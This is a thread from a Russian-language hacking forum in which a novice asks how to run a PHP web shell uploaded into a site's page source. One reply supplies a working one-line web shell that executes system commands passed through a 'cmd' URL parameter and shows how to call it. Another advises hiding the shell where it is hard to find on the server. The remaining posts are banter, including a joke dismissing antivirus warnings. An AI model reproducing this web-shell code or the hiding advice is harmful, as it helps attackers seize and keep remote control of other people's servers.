Сразу приношу свои извинения за создание топика не в том разделе. Просто не знаю к какому именно он относится. Так что убедительная просьба к модераторам - не удалять, а просто перенести данную тему по адресу. Итак: Бывают случаи, когда шелл можно залить просто в исходник страницы. То есть получается что-то такое: Code: [COLOR=Red]<html><body>[/COLOR] [COLOR=DarkOrchid]бла-бла-бла[/COLOR] [COLOR=YellowGreen]<?php содержимое шелла ?>[/COLOR] [COLOR=DarkOrchid]бла-бла-бла[/COLOR] [COLOR=Red]</body></html>[/COLOR] Ну и я не знаю - можно ли как то открыть данный шелл или нет?? Думал я в таком направлении: В сурс шелла добавить какой нить html-код, что-бы на той странице отображалась что-то вроде кнопки, при нажатии на которую шелл открывался отдельно на новой странице. Прошу сильно не пинать, просто я ещё зелёный
файл должен быть .php можно заюзать eval и тогда скрипту нужно будет передать параметр Code: <?@system($_GET[cmd])?> Тогда надо будет скрипту с шеллом передать параметр cmd типо сайт.ру/shell.php?cmd=команда
Да, каникулы скрывать не стану)) НО Во-первых) ещё экзамены) Во-вторых) новичков надо уважать, я не горю желанием ни с кем ссориться, но тебе всё таки стоит почитать КОНСТИТУЦИЮ ХАКЕРА
епааать вы шо хакир? О_о эта самая а чо именна .php это типа значит фаил будет выпалнин или чо? заюзать ивал а в коде cюстем и какиета скобачки так и нада или где брать этот ивал? а чо это вот я все в опере жму тама изменить исходный код все делаю как ты гаваришь и ничо не работает, можна пападробней куда нажать нада?
Дерьмо какое-то. Нет никакой конституции у хакИров и никогда не было. Все что там написано - полная фигня. Семь раз погугли - один раз спроси. И вообще изучил бы лучше сперва теории по шеллам и php. html - разметка, php - непосредственно сами скрипты, шелл тоже является php кодом и в html страницах его не выполнить, можно только через фрейм прогрузить от php на другой странице, только хз зачем. И его (шелл) лучше не в index заливать по кнопке, а туда где его будет сложнее найти на сервере.
О том что такое php и как оно работает и что такое шеллы. Под словом "теория" я понимаю информацию в общих понятиях а не в конкретном случае. В данном случае "теории" о php хватило бы на то что php не работает в html страницах. Достаточно прочитать что такое php и что такое html. А о шеллах даже статейка была на ачате старенькая.
я видел у хикеров работает, вы наверно плохой хакер PHP: идешь, кароче, на php.su или php.net и читаешь, пока не поймешь, где брать ивал. был я там, там заставляют качать какиета архивы, уверен или смс нада слать или там с вирусаами как всегда вообщем нинала мне фигню втюхивать
Та ты не боись, смски там бесплатные, а антивири на сами архивы орут, а не на файлы внутри. Пиндосы архиваторы делать не умеют